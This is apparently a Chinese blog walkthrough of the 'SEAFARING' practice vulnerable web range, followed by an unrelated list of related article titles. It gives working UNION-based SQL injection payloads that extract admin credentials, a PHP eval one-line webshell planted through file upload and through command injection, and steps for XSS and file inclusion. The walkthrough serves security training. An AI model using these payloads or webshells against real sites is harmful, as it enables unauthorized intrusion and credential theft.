当前位置: 首页 > article >正文

SEAFARING靶场漏洞攻略

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接


http://www.kler.cn/news/303597.html

相关文章:

  • AnyGPT:多模态语言模型,任意处理语音、图像和音乐
  • 【深度学习】【图像分类】【OnnxRuntime】【Python】VggNet模型部署
  • 项目进度一
  • 数据库常规操作
  • vue引入三维模型
  • 【绿盟科技盟管家-注册/登录安全分析报告】
  • 2024CCPC网络预选赛
  • raksmart大带宽服务器租用
  • mycat双主高可用架构部署-MySQL5.7环境部署第一台
  • 「漏洞复现」紫光电子档案管理系统 selectFileRemote SQL注入漏洞
  • TestCraft - GPT支持的测试想法生成器和自动化测试生成器
  • 前端使用COS上传文件
  • 为什么要进行MySQL增量备份?
  • 【数据结构和算法实践-树-LeetCode112-路径总和】
  • 力扣: 四数相加II
  • Linux安装管理多版本JDK
  • CSS Clip-Path:重塑元素边界的艺术
  • mysql慢sql问题修复
  • 计算机毕业设计 自习室座位预约系统的设计与实现 Java+SpringBoot+Vue 前后端分离 文档报告 代码讲解 安装调试
  • qt操作excel(QAxObject详细介绍)
  • 论文解读《LaMP: When Large Language Models Meet Personalization》
  • 浏览器插件利器--allWebPluginV2.0.0.20-alpha版发布
  • 首批通过!华为云CodeArts Snap智能开发助手通过可信AI智能编码工具评估,获当前最高等级
  • 气膜体育馆:为学校打造智能化运动空间—轻空间
  • 响应式网站真的就只是多了一个媒体查询吗?
  • CSS学习17--CSS3 过渡、2D变形、3D变形、动画
  • linux 内核代码学习(九)--Linux内核启动和文件系统
  • MySQL 子查询
  • 计算几何学习
  • 【论文阅读】视觉分割新SOTA: Segment Anything(SAM)